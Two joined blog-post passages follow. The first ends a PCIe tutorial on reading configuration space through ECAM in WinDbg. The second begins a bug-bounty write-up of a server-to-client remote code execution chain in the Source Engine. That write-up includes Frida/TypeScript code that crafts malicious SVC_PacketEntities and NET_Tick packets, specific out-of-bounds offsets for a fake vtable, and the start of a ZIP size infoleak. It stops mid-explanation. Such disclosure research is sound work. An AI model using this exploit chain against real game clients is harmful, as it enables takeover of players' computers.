After this, the kernel is now able to communicate with the configuration space of the device by using the virtual mapping. But what does this configuration space look like? Well, it’s just a bunch of blocks of configuration space structures we talked about above. Each possible BDF a device could have is given space in ECAM to configure it. It is laid out in such a way that the BDF of the device tells you exactly where its configuration space is in ECAM. That is, given a BDF, we can calculate the offset to add to the base of the ECAM region in order to talk to the device because all ECAM regions for each function are the same size.

image-20230213155519832

If the device is not present, the system will read back all FFs (all 1s in binary). This would showcase that the device is not currently active on the system

From this diagram, we can start to see how the enumeration of PCIe actually takes place. When we read back valid config space data, we know a device exists at that BDF. If we read back FFs instead, we know the device is not in that slot or function. Of course, we don’t brute force every address in order to enumerate all devices, as that would be costly due to the overhead of the MMIO. But, a smart version of this brute force is how we can quickly enumerate all devices powered up and responding to us on config space.

Putting it all together - A software config space access

Now that we see how config space is accessed, we can put the two sides together (the hierarchy and the MMIO) in to see the full path of an instruction reading config space from kernel mode.

image-20230213161344040

Let’s step through the entire path taken here (from left to right):

  • Some code running in kernel mode reads an offset from the ECAM virtual mapping.
  • The virtual mapping is translated by the page tables of the CPU into a physical address into ECAM.
  • The physical address is read, causing an operation to happen in the internal CPU Interconnect to inform the Root Complex of the access.
  • The Root Complex generates a packetized version of the request as a TLP that says “Read the value at offset 0x0 for device 02:00.0” and sends it through the hierarchy.
  • The TLP is received by this display controller on Bus 2 and sees that it is a configuration space TLP. It now knows to respond with a configuration space response TLP that contains the contents of the value at offset 0x0.

Now let’s look at the response:

image-20230213161728452

The path of the response is much less interesting. The device responds with a special TLP containing the value at offset 0 (which we know is the Vendor ID). That packet makes its way back to the Requester (which was the Root Complex) and the interconnect informs the CPU to update the value of rax to the value of 0x10DE which is the vendor ID of the NVIDIA graphics card. The next instruction then begins to execute on the CPU.

As you can imagine, accesses this way can be quite a lot slower than that of RAM with all of this TLP generation. This is indeed true, and one of the main reasons there is more ways than this MMIO method in order to talk to a device. In the next post, I will go into more detail about the other method, DMA, and its vital importance to the ensuring that software can transfer memory as fast as possible between the CPU and the device.

Exercise: Accessing ECAM manually through WinDbg

So, we took a look at how a config space access theoretically happens, but let’s do the same thing ourselves with a debugger. To do that, we will want to:

  • Locate where ECAM is on the system.
  • Calculate the offset into ECAM to read the Vendor ID of the the device. For this, I chose the Multimedia Device @ 02:00.1 which is on the NVIDIA graphics card.
  • Perform a physical memory read at that address to retrieve the value.

The first step is locate ECAM. This part is a little tricky given that the location of ECAM comes through ACPI, specifically the MCFG table in ACPI. This is the table firmware uses to tell the OS where ECAM is located in the physical memory map of the system. There is a lot to talk about with ACPI and how it is used in combination with PCI, but for now I’ll just quickly skip to the relevant parts to achieve our goal.

In our debugger, we can dump the cached copies of all ACPI tables by using !acpicache. To dump MCFG, click on the link MCFG to dump its contents, or type !acpitable MCFG manually:

8: kd> !acpicache
Dumping cached ACPI tables...
  XSDT @(fffff7b6c0004018) Rev: 0x1 Len: 0x0000bc TableID: SLIC-WKS
  MCFG @(fffff7b6c0005018) Rev: 0x1 Len: 0x00003c TableID: SLIC-WKS
  FACP @(fffff7b6c0007018) Rev: 0x4 Len: 0x0000f4 TableID: SLIC-WKS
  APIC @(fffff7b6c0008018) Rev: 0x2 Len: 0x000afc TableID: SLIC-WKS
  DMAR @(fffff7b6c000a018) Rev: 0x1 Len: 0x0000c0 TableID: SLIC-WKS
  HPET @(fffff7b6c015a018) Rev: 0x1 Len: 0x000038 TableID: SLIC-WKS
  TCPA @(ffffdc89b07209f8) Rev: 0x2 Len: 0x000064 TableID: EDK2    
  SSDT @(ffffdc89b0720a88) Rev: 0x2 Len: 0x0003b3 TableID: Tpm2Tabl
  TPM2 @(ffffdc89b0720e68) Rev: 0x3 Len: 0x000034 TableID: EDK2    
  SSDT @(ffffdc89b07fc018) Rev: 0x1 Len: 0x0013a1 TableID: Plat_Wmi
  UEFI @(ffffdc89b07fd3e8) Rev: 0x1 Len: 0x000042 TableID: 
  BDAT @(ffffdc89b07fd458) Rev: 0x1 Len: 0x000030 TableID: SLIC-WKS
  MSDM @(ffffdc89b07fd4b8) Rev: 0x3 Len: 0x000055 TableID: SLIC-WKS
  SLIC @(ffffdc89b07fd538) Rev: 0x1 Len: 0x000176 TableID: SLIC-WKS
  WSMT @(ffffdc89b07fd6d8) Rev: 0x1 Len: 0x000028 TableID: SLIC-WKS
  WDDT @(ffffdc89b0721a68) Rev: 0x1 Len: 0x000040 TableID: SLIC-WKS
  SSDT @(ffffdc89b2580018) Rev: 0x2 Len: 0x086372 TableID: SSDT  PM
  NITR @(ffffdc89b26063b8) Rev: 0x2 Len: 0x000071 TableID: SLIC-WKS
  ASF! @(ffffdc89b2606548) Rev: 0x20 Len: 0x000074 TableID:  HCG
  BGRT @(ffffdc89b26065e8) Rev: 0x1 Len: 0x000038 TableID: TIANO   
  DSDT @(ffffdc89b0e94018) Rev: 0x2 Len: 0x021c89 TableID: SLIC-WKS
8: kd> !acpitable MCFG
HEADER - fffff7b6c0005018
  Signature:               MCFG
  Length:                  0x0000003c
  Revision:                0x01
  Checksum:                0x3c
  OEMID:                   HPQOEM
  OEMTableID:              SLIC-WKS
  OEMRevision:             0x00000001
  CreatorID:               INTL
  CreatorRev:              0x20091013
BODY - fffff7b6c000503c
fffff7b6`c000503c  00 00 00 00 00 00 00 00-00 00 00 d0 00 00 00 00  ................
fffff7b6`c000504c  00 00 00 ff 00 00 00 00                          ........

To understand how to read this table, unfortunately we need to look at the ACPI specification. Instead of making you do that, I will save you the pain and pull the relevant section here:

image-20230213163718405

As the !acpitable command has already parsed and displayed everything up to Creator Revision in this table, the first 8 bytes of the BODY are going to be the 8 bytes of Reserved memory at offset 36. So, we skip those 8 bytes and find the following structure:

image-20230213163745566

The first 8 bytes of this is the address of the ECAM region for the region following Reserved. So that means the offset of the ECAM base address is at offset 8.

BODY - fffff7b6c000503c
fffff7b6`c000503c  00 00 00 00 00 00 00 00-00 00 00 d0 00 00 00 00  ................
fffff7b6`c000504c  00 00 00 ff 00 00 00 00                          ........

For this system, ECAM is located at address: 0xD0000000. (Don’t forget to read this in little endian order)

To verify we got the correct address, let’s read the vendor ID of 00:00.0 which is also is the first 2 bytes of ECAM. We will do this using the !dw command, which stands for dump physical word (the exclamation point means physical). This command requires you specify a caching type, which for our case will always be [uc] for uncached. It also supplies a length, which is the number of words to read specified by L1.

NOTE: It is important that we always match the size of the target device memory to the size we are reading from software. This means, if the value we want to read is a 16-bit value (like Vendor ID), then we must perform a 16-bit read. Performing a 32-bit read might change the result of what the device responds with. For configuration space, we are okay to read larger sizes for Vendor ID, but this is not true in all cases. It’s good to get in the habit of matching the read size to the target size to avoid any unexpected results. Remember: Device memory is not RAM.

Putting that all together, we read the VendorID of 00:00.0 like so:

8: kd> !dw [uc] D0000000 L1
#d0000000 8086

The resulting value we read is 0x8086, which happens to be the vendor ID of Intel. To verify this is correct, let’s dump the same thing using !pci.

8: kd> !pci 100 0 0 0

PCI Configuration Space (Segment:0000 Bus:00 Device:00 Function:00)
Common Header:
    00: VendorID       8086 Intel Corporation

Reading VendorID from a specific Function

Now to calculate the ECAM address for another function we wish to talk to (NVIDIA card at 02:00.1), we will need to perform an “array access” manually by calculating the offset into ECAM using the BDF of the target function and some bit math.

The way to calculate this is present in the PCIe specification, which assigns a certain number of bits of ECAM for bus, device, and function to calculate the offset:

| 27 - 20 | 19 - 15 | 14 - 12     |  11 - 0       |
| Bus Nr  | Dev Nr  | Function Nr | Register      |

By filling in the BDF and shifting and ORing the results based on the bit position of each element, we can calculate an offset to add to ECAM.

I will use python but you can use whatever calculator you’d like:

>>> hex(0xD0000000 + ((2 << 20) | (0 << 15) | (1 << 12)))
'0xd0201000'

This means that the ECAM region for 02:00.1 is located at 0xD0201000.

Now to read the value of the VendorID from the function:

8: kd> !dw [uc] D0201000 L1
#d0201000 10de

The result was 0x10de, which we know from above is NVIDIA Corporation! That means we successfully read the first value from ECAM for this function.

Conclusion

This single post ended up being a lot longer than I expected! Rather than continue this single post, I will instead split this up and flesh out the series over time. There are so many topics I would like to cover about PCIe and only so much free time, but in the next post I will go into more detail about device BARs (a form of device-specific MMIO) and DMA (Direct Memory Access). This series will continue using the same tenants as before, focusing more on understanding rather than specific details.

Hopefully you enjoyed this small look into the world of PCIe! Be back soon with more.

Part 2 - Not yet available

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

image-20200507164606006

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

image-20200507170851575

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

image-20200507173708203

This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

image-20200513141444074

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

image-20200513142919977

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

image-20200430014752750

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

